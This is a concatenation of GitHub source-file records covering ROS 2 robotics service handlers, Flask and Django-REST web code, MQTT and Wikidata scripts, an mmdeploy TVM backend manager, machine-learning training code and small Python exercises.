self._bridge.servo_write(digital_pin, position)\n\n return response\n\n def _handle_set_analog_mode(\n self, request: SetAnalogModeSvc.Request, response: SetAnalogModeSvc.Response\n ) -> SetAnalogModeSvc.Response:\n \"\"\"Handle ROS 2 analog pin mode changes\"\"\"\n # Translate parameters\n analog_pin: int = request.analog_pin\n analog_mode: AnalogMode\n\n try:\n analog_mode = RosTranslator.analog_mode_to_telemetrix(request.analog_mode)\n except KeyError:\n self.get_logger().error(\n f\"Invalid analog mode ({request.analog_mode}), disabling pin\"\n )\n analog_mode = AnalogMode.DISABLED\n\n # Debug logging\n 
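# These service handlers all follow the same shape: rclpy hands the callback
# the request plus a pre-allocated response object, and the callback translates
# the request fields, performs the work, and returns the filled-in response.
# A generic sketch of that contract using the stock example_interfaces service
# (hypothetical wiring, not part of this bridge):
import rclpy.node
from example_interfaces.srv import AddTwoInts

class MinimalService(rclpy.node.Node):
    def __init__(self) -> None:
        super().__init__("minimal_service")
        self._srv = self.create_service(AddTwoInts, "add_two_ints", self._handle_add)

    def _handle_add(self, request, response):
        # Translate parameters, perform the operation, populate the response
        response.sum = request.a + request.b
        return response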
self.get_logger().info(f\"Setting analog pin {analog_pin} to mode {analog_mode}\")\n\n # Perform service\n self._bridge.set_analog_mode(analog_pin, analog_mode)\n\n return response\n\n def _handle_set_cpu_fan_sampling_interval(\n self,\n request: SetSamplingIntervalSvc.Request,\n response: SetSamplingIntervalSvc.Response,\n ) -> SetSamplingIntervalSvc.Response:\n \"\"\"Handle ROS 2 CPU fan sampling interval changes\"\"\"\n # Translate parameters\n sampling_interval_ms: int = request.sampling_interval_ms\n\n # Debug logging\n self.get_logger().info(\n f\"Setting CPU fan sampling interval to {sampling_interval_ms} ms\"\n )\n\n # Perform service\n self._bridge.set_cpu_fan_sampling_interval(sampling_interval_ms)\n\n return response\n\n def _handle_set_digital_mode(\n self, request: SetDigitalModeSvc.Request, response: SetDigitalModeSvc.Response\n ) -> SetDigitalModeSvc.Response:\n \"\"\"Handle ROS 2 digital pin mode changes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n digital_mode: DigitalMode\n\n try:\n digital_mode = RosTranslator.digital_mode_to_telemetrix(\n request.digital_mode\n )\n except KeyError:\n self.get_logger().error(\n f\"Invalid digital mode ({request.digital_mode}), disabling pin\"\n )\n digital_mode = DigitalMode.DISABLED\n\n # Debug logging\n self.get_logger().info(\n f\"Setting digital pin {digital_pin} to mode {digital_mode}\"\n )\n\n # Perform service\n self._bridge.set_digital_mode(digital_pin, digital_mode)\n\n return response\n\n def _handle_set_sampling_interval(\n self,\n request: SetSamplingIntervalSvc.Request,\n response: SetSamplingIntervalSvc.Response,\n ) -> SetSamplingIntervalSvc.Response:\n \"\"\"Handle ROS 2 sampling interval changes\"\"\"\n # Translate parameters\n sampling_interval_ms: int = request.sampling_interval_ms\n\n # Debug logging\n self.get_logger().info(\n f\"Setting sampling interval to {sampling_interval_ms} ms\"\n )\n\n # Perform service\n self._bridge.set_sampling_interval(sampling_interval_ms)\n\n return response\n\n def _get_timestamp(self) -> TimeMsg:\n return self.get_clock().now().to_msg()\n","repo_name":"eigendude/OASIS","sub_path":"oasis_drivers_py/oasis_drivers/nodes/telemetrix_bridge_node.py","file_name":"telemetrix_bridge_node.py","file_ext":"py","file_size_in_byte":18051,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"73686856168","text":"# Exercício Python 075: Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. 
At the end,\n# show:\n\n# A) How many times the value 9 appeared.\n# B) At which position the first value 3 was entered.\n# C) Which of the numbers were even.\n\nnum = int(input('Enter the first value: '))\nnum2 = int(input('Enter the next value: '))\nnum3 = int(input('Enter the third value: '))\nnum4 = int(input('Enter the last value: '))\ntupla = (num, num2, num3, num4)\nprint(f'You entered the values {tupla}')\nif 9 in tupla:\n print(f'The number nine appeared {tupla.count(9)} times')\nelse:\n print('The number nine is not in the tuple')\nif 3 in tupla:\n print(f'The value three first appeared at position {tupla.index(3) + 1}')\nelse:\n print('The value three does not exist in the tuple!')\n\nprint('The even values entered were:', end=' ')\nfor x in tupla:\n if x % 2 == 0:\n print(x, end=', ')\n\n","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"39509917009","text":"# parsers.py\nimport json\nfrom pathlib import Path\n\nimport jsonschema\nfrom jsonschema.exceptions import SchemaError\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.parsers import JSONParser\n\ndashboard_template_schema = json.loads((Path(__file__).parent / \"dashboard_template_schema.json\").read_text())\n\n\nclass DashboardTemplateCreationJSONSchemaParser(JSONParser):\n \"\"\"On DashboardTemplate creation, validate the JSON against a JSON schema.\n The template is sent in the \"template\" key\"\"\"\n\n def parse(self, stream, media_type=None, parser_context=None):\n data = super(DashboardTemplateCreationJSONSchemaParser, self).parse(\n stream, media_type or \"application/json\", parser_context\n )\n try:\n template = data[\"template\"]\n jsonschema.validate(template, dashboard_template_schema)\n except ValueError as error:\n raise ValidationError(detail=f\"Invalid JSON: {error}\")\n except SchemaError as error:\n raise ValidationError(detail=str(error))\n except jsonschema.exceptions.ValidationError as error:\n raise ValidationError(detail=str(error))\n else:\n return data\n","repo_name":"PostHog/posthog","sub_path":"posthog/api/dashboards/dashboard_template_json_schema_parser.py","file_name":"dashboard_template_json_schema_parser.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} {"seq_id":"4202572244","text":"import pandas as pd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler#, MinMaxScaler\nfrom transformer import Provider_Transformer\n\nclass Fraud_Detector(object):\n def __init__(self):\n pass\n def build_model(self):\n \"\"\"\n Building model pipeline \n \"\"\"\n steps = [#('preprocessor',preprocessor),\n ('rescale', StandardScaler()),\n #('rescale', MinMaxScaler()),\n ('clf', LogisticRegression(class_weight ='balanced',C=0.01,random_state=67, max_iter=10000))]\n self.pipeline = Pipeline(steps)\n def train(self):\n \"\"\"\n Train a model \n \"\"\"\n # load the data from csv to pandas dataframe\n # X_test_aggregated_raw = pd.read_csv(\"data/X_test_0817.csv\")\n X_train_aggregated_raw = pd.read_csv(\"data/X_train_0817.csv\")\n # y_test_aggregated_raw = pd.read_csv(\"data/y_test_0817.csv\")\n y_train_aggregated_raw = pd.read_csv(\"data/y_train_0817.csv\")\n\n # Define feature and target \n target = [\"Provider\", 
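# The DashboardTemplateCreationJSONSchemaParser above boils down to one call:
# jsonschema.validate(instance, schema), which raises
# jsonschema.exceptions.ValidationError on mismatch. A tiny standalone example
# with a made-up schema, not PostHog's real dashboard schema:
import jsonschema

schema = {
    "type": "object",
    "properties": {"name": {"type": "string"}},
    "required": ["name"],
}
jsonschema.validate({"name": "dashboard"}, schema)  # passes silently
try:
    jsonschema.validate({"name": 42}, schema)  # wrong type for "name"
except jsonschema.exceptions.ValidationError as error:
    print(f"Invalid template: {error.message}")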
\"PotentialFraud\"]\n features = list(X_train_aggregated_raw.columns)\n self.features = [fea for fea in features if fea not in target]\n\n y_train=y_train_aggregated_raw['PotentialFraud']\n # y_test=y_test_aggregated_raw['PotentialFraud']\n X_train=X_train_aggregated_raw.drop('Provider',axis=1).fillna(0)\n # X_test=X_test_aggregated_raw.drop('Provider',axis=1).fillna(0)\n\n self.build_model()\n self.model = self.pipeline.fit(X_train, y_train)\n \n def predict(self, context):\n \"\"\"\n context: dictionary format {'TotalTEDiagCode':502,... etc}\n return np.array\n \"\"\"\n num_predictions = len([context[self.features[0]]])\n print(num_predictions)\n X = pd.DataFrame(context,index=range(num_predictions))\n return self.model.predict_proba(X)","repo_name":"wx0373/Medical-fraud","sub_path":"MedicalCareProviderFraud_app/app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24944266367","text":"from flask import Blueprint, render_template, request, url_for, g, flash\nfrom werkzeug.utils import redirect\n\nfrom main.models import EnableDay, ComeMenber, EnableDay_comment, User, Each_snack\nfrom main.forms import Day_Comment, SnackForm\nfrom .auth import login_required\nfrom main import db\n\nbp = Blueprint('date', __name__, url_prefix='/date')\n\n@bp.route('/')\ndef date():\n form = Day_Comment()\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n date = year + ',' + month + ',' + day\n # 오는사람 안오는사람 구분하기\n member = ComeMenber.query.filter_by(date=date).first()\n if not member:\n c_p_list, n_c_p_list = [''], ['']\n else:\n c_p_list, n_c_p_list = list((member.comeuser).split(',')), list((member.not_comeuser).split(','))\n # 그날의 내용 보여주기\n contents_list = EnableDay_comment.query.filter_by(date=date)\n name_list = []\n for i in contents_list:\n user = User.query.filter_by(id=i.id_user).first()\n name_list.append(user.username)\n # 그날 파인만 하는지 안하는지 알려주기\n e_d = EnableDay.query.filter_by(year=year, month=month, day = day).first()\n if e_d:\n enable_feynman = True\n else:\n enable_feynman = False\n return render_template('/day/date_detail.html', year = year, month = month, day = day, c_p_list = c_p_list, n_c_p_list = n_c_p_list,\n form = form, contents_list = contents_list, name = name_list, enable_feynman = enable_feynman)\n\n\n@bp.route(\"/EnableDay\")\n@login_required\ndef enableDay():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n e_d = EnableDay.query.filter_by(year=year, month=month, day = day).first()\n days = EnableDay(year=year, month=month, day = day)\n if e_d:\n db.session.delete(e_d)\n else:\n db.session.add(days)\n db.session.commit()\n return redirect(url_for('main.index'))\n\n\n@bp.route('/Record')\n@login_required\ndef record():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n come_notcome = request.args.get('come', \"T\", str)\n date = year + ',' + month + ',' + day\n come_people = ComeMenber.query.filter_by(date=date).first()\n if not come_people:\n # 데이터베이스에 날짜가 없을 때\n if come_notcome == 'T': \n today_people = ComeMenber(date = date, comeuser = ','+g.user.name, not_comeuser = \"\")\n else:\n today_people = ComeMenber(date = date, comeuser = \"\", not_comeuser = ','+g.user.name)\n db.session.add(today_people)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n else:\n # 데이터베이스에 날짜가 있을 때\n c_p_list, n_c_p_list = 
list((come_people.comeuser).split(',')), list((come_people.not_comeuser).split(','))\n\n #이름이 포함되있을 경우\n if g.user.name in c_p_list:\n #온다에 들어있을 때\n c_p_list.remove(g.user.name)\n elif g.user.name in n_c_p_list:\n #오지 않는다에 들어있을 때\n n_c_p_list.remove(g.user.name)\n \n #이름이 아무곳에도 포함 안되있을 경우\n if come_notcome == 'T': \n c_p_list.append(g.user.name)\n else:\n n_c_p_list.append(g.user.name)\n\n c_p_input, c_n_p_input = \",\".join(c_p_list), \",\".join(n_c_p_list)\n all_input = ComeMenber(date = date, comeuser = c_p_input, not_comeuser = c_n_p_input)\n db.session.delete(come_people)\n db.session.commit()\n db.session.add(all_input)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Comment///', methods = (\"GET\",\"POST\"))\n@login_required\ndef comment(year, month, day):\n date_list = [year, month, day]\n date_input = ','.join(date_list)\n form = Day_Comment()\n if request.method == 'POST' and form.validate_on_submit(): \n user = User.query.filter_by(username=g.user.username).first()\n text = EnableDay_comment(a_user = user, Title = form.Title.data , content = form.content.data, date = date_input)\n db.session.add(text)\n db.session.commit()\n elif (not form.Title.data) and (not form.content.data): \n flash(\"제목과 내용은 반드시 기입해야 합니다.\")\n elif not form.Title.data:\n flash(\"제목은 반드시 기입해야 합니다.\")\n elif not form.content.data:\n flash(\"내용은 반드시 기입해야 합니다.\")\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Snack', methods = (\"GET\",\"POST\"))\n@login_required\ndef snack():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n date = year + ',' + month + ',' + day\n come_people = ComeMenber.query.filter_by(date=date).first()\n if come_people:\n if (come_people.comeuser != \"\"):\n come_people_name_list = list(come_people.comeuser.split(','))\n come_people_name_list.remove('')\n # 이름을 아이디로 바꾸기\n sub1 = []\n for name in come_people_name_list:\n each_user = User.query.filter_by(name=name).first()\n sub1.append(each_user.username)\n come_people_name_list = sub1\n #이름을 아이디로 ���꾸기 끝\n else:\n come_people_name_list = False\n else:\n come_people_name_list = False\n \n form = SnackForm()\n if request.method == 'POST' and form.validate_on_submit():\n user = User.query.filter_by(username=g.user.username).first()\n text = Each_snack(date = date, content = form.snack_content.data, a_user = user)\n db.session.add(text)\n db.session.commit()\n \n snack_all_data = Each_snack.query.filter_by(date=date)\n return render_template('/day/snack.html', come_people_name_list = come_people_name_list, form = form, snack_all_data = snack_all_data, \n year = year, month = month, day = day)\n\n\n@bp.route('/Delete_snack/', methods = (\"GET\",\"POST\"))\n@login_required\ndef delete_snack_function(snack_id):\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n delete_snack = Each_snack.query.filter_by(id=snack_id).first()\n db.session.delete(delete_snack)\n db.session.commit()\n return redirect( url_for('date.snack')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Delete_comment/', methods = (\"GET\",\"POST\"))\n@login_required\ndef delete_comment_function(comment_id):\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n delete_comment = EnableDay_comment.query.filter_by(id=comment_id).first()\n db.session.delete(delete_comment)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, 
day) )","repo_name":"pizza119/site_handmade-feynman.kr","sub_path":"main/views/dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17441353444","text":"T = int(input())\ndef function(n,m):\n\tlen_n = len(n)\n\tskip = {val: (len_n - i - 1) for i, val in enumerate(n)}\n\tend = len_n - 1\n\tout = 0\n\twhile end <= len(m):\n\t\tif m[end] == n[-1]:\n\t\t\tfor i in range(end, (end - len_n + 1), -1):\n\t\t\t\tif m[i] == n[i - (end - len_n + 1)]:\n\t\t\t\t\tout += 1\n\t\t\t\telse:\n\t\t\t\t\tend = skip[i]\n\t\t\tif out == len_n:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\tout = 0\n\t\tend += len_n\n\t\tif end > len(m):\n\t\t\tend = len(m)\n\treturn 0\n\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\n# for test_case in range(1, T + 1):\n# \tn = input() # 패턴\n# \tm = input() # 문장\n# \tprint('#{} {}'.format(test_case, function(n,m)))\n\nfor test_case in range(1, T + 1):\n\tn = input() # 패턴\n\tm = input() # 문장\n\tif n in m:\n\t\tout= 1\n\telse:\n\t\tout=0 # 이거도 답임..\n\tprint('#{} {}'.format(test_case, out))\n\n","repo_name":"dodoyeon/SW_Academy","sub_path":"string/pattern.py","file_name":"pattern.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74280921447","text":"import os #operating system\nproducts = []\nif os.path.isfile('products.csv'):\n print('YES')\n#讀取資料\n with open('products.csv', 'r', encoding = 'utf-8') as f:\n for line in f:\n if '商品,價格' in line:\n continue #跳過\"繼續執行line\"\n name, price = line.strip().split(',')\n products.append([name, price])\n\n print(products)\nelse:\n print('NO')\n\n#讓使用者輸入商品名稱與價格\nwhile True:\n name = input('請輸入您的商品名稱:')\n if name == 'q':\n break\n price = input('請輸入您的商品價格:')\n price = int(price)\n p = []\n p.append(name)\n p.append(price) #簡化(7-9行)版 p = [name, price]\n products.append(p)#簡化(7-10行)版 products.append([name,price])\nprint(products)\n\n#印出商品名稱與價格\nfor product in products:\n #print(product)\n print(product[0],'的價格為', product[1])\n\n#寫入檔案\nwith open('products.csv','w',encoding = 'utf-8' ) as f:\n f.write('商品,價格\\n')\n for p in products:\n f.write(p[0] + ',' + str(p[1]) + '\\n')","repo_name":"yhchen0630/product","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5395971850","text":"from Questions.q0066PlusOne.BruteForce import plusOne\n\ndigits = [1,0,9,9,9]\nans = [1,1,0,0,0]\n\noutput = plusOne(digits)\n\nif ans == output:\n print(\"right\")\nelse:\n print(output)\n print(\"wrong\")","repo_name":"Lazy-yin/LeetCode-practice","sub_path":"Tests/test_q66.py","file_name":"test_q66.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17811760954","text":"import paho.mqtt.client as mqttc\n\nBUZZER_STATUS_TOPIC = 'UdeA/SmartGas/Buzzer/smargas_esp32_001/Status'\nBUZZER_BROKER_URL = '192.168.204.206'\nBUZZER_BROKER_PORT = 1883\n\n\nclass BuzzerListener:\n def __init__(self, observer):\n self.client = mqttc.Client()\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n self.observer = observer\n try:\n self.client.connect(BUZZER_BROKER_URL, BUZZER_BROKER_PORT, 60)\n except Exception as ex:\n print('SmartGas >> Failed broker connection. 
ex: {}'.format(ex))\n\n def on_connect(self, client, userdata, flags, rc):\n print('SmartGas >> Attempting MQTT connection to: ', BUZZER_STATUS_TOPIC)\n client.subscribe(topic=BUZZER_STATUS_TOPIC, qos=1)\n\n def on_message(self, client, userdata, msg):\n print('Message arrived: ', msg.payload.decode('utf-8'))\n self.observer.process_buzzer_status(msg.payload.decode('utf-8'))\n\n def start(self):\n print('SmartGas >> Looping')\n self.client.loop_forever()\n","repo_name":"victor013001/SmartGas-App","sub_path":"comm/BuzzerListener.py","file_name":"BuzzerListener.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920234841","text":"import logging\nimport os.path as osp\nfrom typing import Any, Optional, Sequence\n\nfrom ..base import BACKEND_MANAGERS, BaseBackendManager\n\n\n@BACKEND_MANAGERS.register('tvm')\nclass TVMManager(BaseBackendManager):\n\n @classmethod\n def build_wrapper(cls,\n backend_files: Sequence[str],\n device: str = 'cpu',\n input_names: Optional[Sequence[str]] = None,\n output_names: Optional[Sequence[str]] = None,\n deploy_cfg: Optional[Any] = None,\n **kwargs):\n \"\"\"Build the wrapper for the backend model.\n\n Args:\n backend_files (Sequence[str]): Backend files.\n device (str, optional): The device info. Defaults to 'cpu'.\n input_names (Optional[Sequence[str]], optional): input names.\n Defaults to None.\n output_names (Optional[Sequence[str]], optional): output names.\n Defaults to None.\n deploy_cfg (Optional[Any], optional): The deploy config. Defaults\n to None.\n \"\"\"\n from .wrapper import TVMWrapper\n bytecode = None if len(backend_files) <= 1 else backend_files[1]\n return TVMWrapper(\n backend_files[0],\n bytecode=bytecode,\n output_names=output_names,\n device=device)\n\n @classmethod\n def is_available(cls, with_custom_ops: bool = False) -> bool:\n \"\"\"Check whether backend is installed.\n\n Args:\n with_custom_ops (bool): check custom ops exists.\n Returns:\n bool: True if backend package is installed.\n \"\"\"\n import importlib\n ret = importlib.util.find_spec('tvm') is not None\n\n return ret\n\n @classmethod\n def get_version(cls) -> str:\n \"\"\"Get the version of the backend.\"\"\"\n if not cls.is_available():\n return 'None'\n else:\n import pkg_resources\n try:\n return pkg_resources.get_distribution('tvm').version\n except Exception:\n return 'None'\n\n @classmethod\n def to_backend(cls,\n ir_files: Sequence[str],\n work_dir: str,\n deploy_cfg: Any,\n log_level: int = logging.INFO,\n device: str = 'cpu',\n **kwargs) -> Sequence[str]:\n \"\"\"Convert intermediate representation to given backend.\n\n Args:\n ir_files (Sequence[str]): The intermediate representation files.\n work_dir (str): The work directory, backend files and logs should\n be saved in this directory.\n deploy_cfg (Any): The deploy config.\n log_level (int, optional): The log level. Defaults to logging.INFO.\n device (str, optional): The device type. 
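# The BuzzerListener above can be exercised end-to-end with a matching
# paho-mqtt publisher: connect to the same broker and publish to the topic the
# listener subscribes to. Broker address and topic are copied from the
# constants above; the "ON" payload is a made-up status value:
import paho.mqtt.client as mqttc

publisher = mqttc.Client()
publisher.connect("192.168.204.206", 1883, 60)
publisher.publish("UdeA/SmartGas/Buzzer/smargas_esp32_001/Status", payload="ON", qos=1)
publisher.disconnect()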
Defaults to 'cpu'.\n Returns:\n Sequence[str]: Backend files.\n \"\"\"\n\n import copy\n\n from mmdeploy.apis.tvm import get_library_ext\n from mmdeploy.utils import (get_calib_filename, get_model_inputs,\n get_partition_config)\n from .onnx2tvm import from_onnx\n model_inputs = get_model_inputs(deploy_cfg)\n\n if device.startswith('cuda'):\n target = 'cuda'\n else:\n target = 'llvm'\n\n lib_ext = get_library_ext()\n\n tvm_files = []\n for model_id, onnx_path in enumerate(ir_files):\n model_input = copy.deepcopy(model_inputs[model_id])\n use_vm = model_input.get('use_vm', False)\n if 'target' not in model_input['tuner']:\n model_input['tuner']['target'] = target\n lib_path = osp.splitext(onnx_path)[0] + lib_ext\n code_path = osp.splitext(\n onnx_path)[0] + '.code' if use_vm else None\n model_input['output_file'] = lib_path\n model_input['onnx_model'] = onnx_path\n model_input['bytecode_file'] = code_path\n\n # create calibration dataset\n if 'qconfig' in model_input:\n from .quantize import HDF5Dataset\n calib_filename = get_calib_filename(deploy_cfg)\n calib_path = osp.join(work_dir, calib_filename)\n partition_cfgs = get_partition_config(deploy_cfg)\n onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]\n partition_type = 'end2end' if partition_cfgs is None \\\n else onnx_name\n dataset = HDF5Dataset(\n calib_path,\n model_input['shape'],\n model_type=partition_type,\n device=target)\n model_input['dataset'] = dataset()\n\n from_onnx(**model_input)\n\n tvm_files += [lib_path, code_path]\n\n return tvm_files\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/backend/tvm/backend_manager.py","file_name":"backend_manager.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"71743507688","text":"#!/usr/bin/env python3\n\nimport multiprocessing as mp\nfrom functools import partial\nfrom typing import Generator, List, Iterable, Tuple, Dict\n\nimport click\nfrom qwikidata.sparql import get_subclasses_of_item\nfrom pymongo import MongoClient\nfrom wikidata_helpers import WikidataMongoDB, WikidataRecord, chunks\nfrom bson.objectid import ObjectId\n\n\"\"\"\nAdds custom metadata to each Wikidata dump record at the top level.\nMainly useful as a preprocessing step for indexing.\n\nThe default information added is\n a) instance-of\n b) languages in which there exists a transliteration/alias\n\"\"\"\n\n\ndef grab_metadata_from_chunk(\n records: Iterable[WikidataRecord],\n) -> List[Tuple[str, Dict[str, List[str]]]]:\n return [\n (\n record.mongo_id,\n {\n \"instance_of\": list(record.instance_ofs),\n \"languages\": list(record.languages),\n },\n )\n for record in records\n ]\n\n\ndef parallel_upsert(\n chunk_plus_id_tuple, verbose, database_name, collection_name, chunk_size\n):\n chunk_id, chunk = chunk_plus_id_tuple\n wdb = WikidataMongoDB(database_name=database_name, collection_name=collection_name)\n if verbose:\n _from = chunk_id * chunk_size\n _to = (chunk_id + 1) * chunk_size - 1\n print(f\"Updating documents {_from} - {_to}...\")\n\n chunk = grab_metadata_from_chunk(chunk)\n for _id, doc in chunk:\n wdb.collection.update_one({\"_id\": ObjectId(_id)}, {\"$set\": doc}, upsert=True)\n\n\n@click.command()\n@click.option(\"--database-name\", \"-db\", default=\"wikidata_db\", help=\"Database name\")\n@click.option(\"--collection-name\", \"-c\", default=\"wikidata\", help=\"Collection name\")\n@click.option(\"--chunk-size\", \"-cz\", type=int, help=\"Chunk 
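# The TVM manager's is_available()/get_version() earlier use two stock
# patterns: importlib's find_spec() tests importability without importing, and
# pkg_resources reports the installed version. The same checks, generalized to
# an arbitrary package name:
import importlib.util

def backend_available(package: str) -> bool:
    return importlib.util.find_spec(package) is not None

def backend_version(package: str) -> str:
    if not backend_available(package):
        return "None"
    import pkg_resources
    try:
        return pkg_resources.get_distribution(package).version
    except Exception:
        return "None"

print(backend_available("tvm"), backend_version("tvm"))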
size\")\n@click.option(\"--n-processes\", \"-np\", type=int, default=8, help=\"Number of processes\")\n@click.option(\"--verbose\", is_flag=True)\ndef main(database_name, collection_name, chunk_size, n_processes, verbose,) -> None:\n \"\"\"Retrieves everything that is an instance of something from MongoDB,\n adds that information at the top level, and upserts the document\"\"\"\n\n outer_wdb = WikidataMongoDB(\n database_name=database_name, collection_name=collection_name\n )\n\n chunks_iterable = chunks(\n outer_wdb.find_matching_docs(as_record=True), chunk_size, should_enumerate=True\n )\n\n _parallel_upsert = partial(\n parallel_upsert,\n verbose=verbose,\n database_name=database_name,\n collection_name=collection_name,\n chunk_size=chunk_size,\n )\n\n with mp.Pool(processes=n_processes) as pool:\n pool.map(_parallel_upsert, chunks_iterable)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"j0ma/wikidata-munger","sub_path":"obsolete/insert_custom_metadata.py","file_name":"insert_custom_metadata.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36522470328","text":"import torch\nimport numpy as np\nimport argparse\nfrom lib.normalization import Normalization, RewardScaling\nfrom lib.replaybuffer import ReplayBuffer,ReplayBufferV2, ReplayBufferV3, ReplayBufferV2_\nfrom agents.hppo_mine import HPPO\nfrom environment import lifecycle_env\nimport torch\nfrom datasets import DataSet\n\nnow_reward = -1000000\n\nclass RewardScaling:\n def __init__(self, shape, gamma):\n self.shape = shape # reward shape=1\n self.gamma = gamma # discount factor\n self.running_ms = RunningMeanStd(shape=self.shape)\n self.R = np.zeros(self.shape)\n\n def __call__(self, x):\n self.R = self.gamma * self.R + x\n self.running_ms.update(self.R)\n x = x / (self.running_ms.std + 1e-8) # Only divided std\n return x\n\n def reset(self): # When an episode is done,we should reset 'self.R'\n self.R = np.zeros(self.shape)\n\nclass Normalization:\n def __init__(self, shape):\n self.running_ms = RunningMeanStd(shape=shape)\n\n def __call__(self, x, update=True):\n # Whether to update the mean and std,during the evaluating,update=Flase\n if update: \n self.running_ms.update(x)\n x = (x - self.running_ms.mean) / (self.running_ms.std + 1e-8)\n\n return x\n \n def save(self, path, te):\n import json\n import os\n\n dict_ = {\n 'n': self.running_ms.n,\n 'mean': self.running_ms.mean.tolist(),\n 'S': self.running_ms.S.tolist(),\n 'std': self.running_ms.std.tolist()\n }\n json.dump(dict_, open(os.path.join(path, \"state_norm_{}.txt\".format(te)), 'w'))\n \n\nclass RunningMeanStd:\n # Dynamically calculate mean and std\n def __init__(self, shape): # shape:the dimension of input data\n self.n = 0\n self.mean = np.zeros(shape)\n self.S = np.zeros(shape)\n self.std = np.sqrt(self.S)\n\n def update(self, x):\n x = np.array(x)\n self.n += 1\n if self.n == 1:\n self.mean = x\n self.std = x\n else:\n old_mean = self.mean.copy()\n self.mean = old_mean + (x - old_mean) / self.n\n self.S = self.S + (x - old_mean) * (x - self.mean)\n self.std = np.sqrt(self.S / self.n)\n\ndef evaluate_policy(args, env, agent, state_norm):\n global now_reward\n times = 500\n evaluate_reward = 0\n mu = 0\n single_re = []\n # infu=0\n for _ in range(times):\n s = env.reset()\n _s = state_norm(s)\n done = False\n re = 0\n episode_reward = 0\n while not done:\n a,p = agent.evalate(_s) # We use the deterministic policy during the evaluating\n if 
agent.ac_type == 'normal' or agent.ac_type == 'stuT':\n param = (p[a*10:a*10+10]+1)/2\n elif agent.ac_type == 'beta' or agent.ac_type=='gamma':\n param = p[a*10:a*10+10]\n elif agent.ac_type == 'F':\n param = p[a:(a+1)] / 2\n s_, r, done = env.step(s, (a, (param)))\n _s = state_norm(s_)\n episode_reward += r\n mu += param[0]\n # infu += param[1]\n s = s_\n # print(a, r)\n single_re.append(episode_reward)\n evaluate_reward += episode_reward\n if evaluate_reward / times > now_reward:\n agent.save('./models')\n state_norm.save('./models', agent.ac_type)\n now_reward = evaluate_reward / times\n return evaluate_reward / times\n\n\ndef main(args, number, seed):\n env = lifecycle_env(DataSet(), 25, 0,[44.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0,65.0,1.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0])\n env_evaluate = lifecycle_env(DataSet(), 25, 0,[44.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0,65.0,1.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0])\n\n np.random.seed(seed)\n torch.manual_seed(seed)\n\n args.state_dim = env.state_dim\n args.action_dim = env.action_dim\n args.param_dim = env.param_dim\n args.max_action = 1\n print(\"env={}\".format('Life Cycle cn'))\n print(\"state_dim={}\".format(args.state_dim))\n 